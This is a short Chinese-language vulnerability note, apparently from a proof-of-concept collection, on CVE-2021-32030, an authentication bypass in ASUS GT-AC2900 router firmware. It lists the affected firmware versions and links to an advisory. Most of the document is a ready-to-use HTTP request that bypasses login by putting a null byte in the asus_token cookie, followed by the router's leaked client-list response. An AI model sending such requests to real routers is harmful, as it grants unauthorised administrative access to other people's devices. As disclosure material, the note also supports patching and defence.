华硕-GT-AC2900-身份验证绕过(CVE-2021-32030).md
1.19 KB / 2021-05-21 09:14:38
# 华硕-GT-AC2900-身份验证绕过(CVE-2021-32030)
ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时,容易受到身份验证绕过漏洞的攻击,从而导致对管理员界面的未经授权的访问。
受影响版本:
* ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)
* ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)
详情分析可以见:https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
通过在auth_check添加空字符进行绕过身份验证。
poc:
```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0
HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close
{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```